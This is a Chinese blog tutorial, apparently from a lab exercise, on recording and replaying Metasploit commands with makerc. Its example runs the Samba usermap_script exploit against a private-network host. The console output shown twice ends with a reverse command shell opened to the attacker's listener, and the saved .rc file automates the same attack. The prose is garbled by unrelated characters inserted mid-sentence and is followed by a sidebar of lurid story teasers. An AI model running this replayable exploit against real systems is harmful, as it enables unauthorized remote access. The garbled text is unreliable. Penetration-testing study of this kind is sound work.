0x09 錄制簡單攻擊腳本

通過makerc 來實(shí)現(xiàn)，就是簡單的把鍵入到終端的命令記錄下來蛙奖，攻擊無關(guān)的命令也會(huì)記錄

msf > workspace book
[*] Workspace: book

msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.10.123  00:0c:29:86:6d:33        Linux               2.6.X  server
192.168.10.254  00:0c:29:7f:de:c9        Linux               2.6.X  server

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5P2uS1mnOkS0zxL6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "5P2uS1mnOkS0zxL6\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:54428) at 2018-12-06 08:19:15 -0500

^Z
Background session 1? [y/N]  y
# 執(zhí)行這個(gè)一指令就會(huì)把從進(jìn)入msfconsole的操作全部記錄按灶，在記錄的文件中把不相關(guān)的指令刪除就行了
msf exploit(multi/samba/usermap_script) > makerc check_samba.rc
[*] Saving last 14 commands to check_samba.rc ...

查看錄制的內(nèi)容

# cat check_samba.rc
# 腳本中有多余的操作可以自己動(dòng)手刪掉
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit

如何使用錄制的腳本

msfconfig -q -r check_samba.rc

-q 不要顯示登陸之后metasploit那一長串花哨的標(biāo)志
-r 后面接錄制的腳本

# 結(jié)果如下
[*] Processing check_samba.rc for ERB directives.
resource (check_samba.rc)> workspace book
[*] Workspace: book
resource (check_samba.rc)> hosts

Hosts
=====

address         mac                name  os_name     os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------     ---------  -----  -------  ----  --------
192.168.10.122  00:0c:29:67:b8:28        Windows XP                    client
192.168.10.123  00:0c:29:86:6d:33        Linux                  2.6.X  server
192.168.10.128  00:0c:29:f7:89:a7        Windows XP                    client
192.168.10.254  00:0c:29:7f:de:c9        Linux                  2.6.X  server

resource (check_samba.rc)> use exploit/multi/samba/usermap_script
resource (check_samba.rc)> show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


resource (check_samba.rc)> set rhost 192.168.10.254
rhost => 192.168.10.254
resource (check_samba.rc)> exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xQRN0G6H4nZxw9Jr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xQRN0G6H4nZxw9Jr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:56845) at 2018-12-06 08:28:16 -0500

# 這里有已經(jīng)有了一個(gè)目標(biāo)終端了

最后編輯于：2018.12.06 21:33:58

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末曼库，一起剝皮案震驚了整個(gè)濱河市晶默，隨后出現(xiàn)的幾起案子矛洞，更是在濱河造成了極大的恐慌微姊，老刑警劉巖酸茴，帶你破解...
沈念sama閱讀 222,104評(píng)論 6贊 515
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異兢交，居然都是意外死亡薪捍，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,816評(píng)論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門配喳，熙熙樓的掌柜王于貴愁眉苦臉地迎上來酪穿，“玉大人，你說我怎么就攤上這事晴裹”患茫” “怎么了？”我有些...
開封第一講書人閱讀 168,697評(píng)論 0贊 360
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵涧团，是天一觀的道長只磷。經(jīng)常有香客問我，道長泌绣，這世上最難降的妖魔是什么钮追？我笑而不...
開封第一講書人閱讀 59,836評(píng)論 1贊 298
?港島之戀（遺憾婚禮）
正文為了忘掉前任，我火速辦了婚禮阿迈，結(jié)果婚禮上元媚，老公的妹妹穿的比我還像新娘。我一直安慰自己仿滔，他們只是感情好惠毁，可當(dāng)我...
茶點(diǎn)故事閱讀 68,851評(píng)論 6贊 397
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著崎页，像睡著了一般鞠绰。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上飒焦，一...
開封第一講書人閱讀 52,441評(píng)論 1贊 310
城市分裂傳說
那天蜈膨，我揣著相機(jī)與錄音屿笼，去河邊找鬼。笑死翁巍，一個(gè)胖子當(dāng)著我的面吹牛驴一，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播灶壶，決...
沈念sama閱讀 40,992評(píng)論 3贊 421
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼肝断，長吁一口氣：“原來是場噩夢(mèng)啊……” “哼！你這毒婦竟也來了驰凛？” 一聲冷哼從身側(cè)響起胸懈，我...
開封第一講書人閱讀 39,899評(píng)論 0贊 276
萬榮殺人案實(shí)錄
序言：老撾萬榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎恰响，沒想到半個(gè)月后趣钱，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 46,457評(píng)論 1贊 318
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡胚宦，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,529評(píng)論 3贊 341
?白月光啟示錄
正文我和宋清朗相戀三年首有，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片枢劝。...
茶點(diǎn)故事閱讀 40,664評(píng)論 1贊 352
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡井联，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出呈野，到底是詐尸還是另有隱情低矮，我是刑警寧澤，帶...
沈念sama閱讀 36,346評(píng)論 5贊 350
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布被冒，位于F島的核電站军掂，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏昨悼。R本人自食惡果不足惜蝗锥，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 42,025評(píng)論 3贊 334
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望率触。院中可真熱鬧终议，春花似錦、人聲如沸葱蝗。這莊子的主人今日做“春日...
開封第一講書人閱讀 32,511評(píng)論 0贊 24
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽两曼。三九已至皂甘，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間悼凑，已是汗流浹背偿枕。一陣腳步聲響...
開封第一講書人閱讀 33,611評(píng)論 1贊 272
情欲美人皮
我被黑心中介騙來泰國打工璧瞬，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人渐夸。一個(gè)月前我還...
沈念sama閱讀 49,081評(píng)論 3贊 377
代替公主和親
正文我出身青樓嗤锉，卻偏偏與公主長得像，于是被迫代替她去往敵國和親墓塌。傳聞我的和親對(duì)象是個(gè)殘疾皇子瘟忱，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,675評(píng)論 2贊 359

0x09 錄制簡單攻擊腳本

通過makerc 來實(shí)現(xiàn)，就是簡單的把鍵入到終端的命令記錄下來蛙奖，攻擊無關(guān)的命令也會(huì)記錄

查看錄制的內(nèi)容

如何使用錄制的腳本

推薦閱讀更多精彩內(nèi)容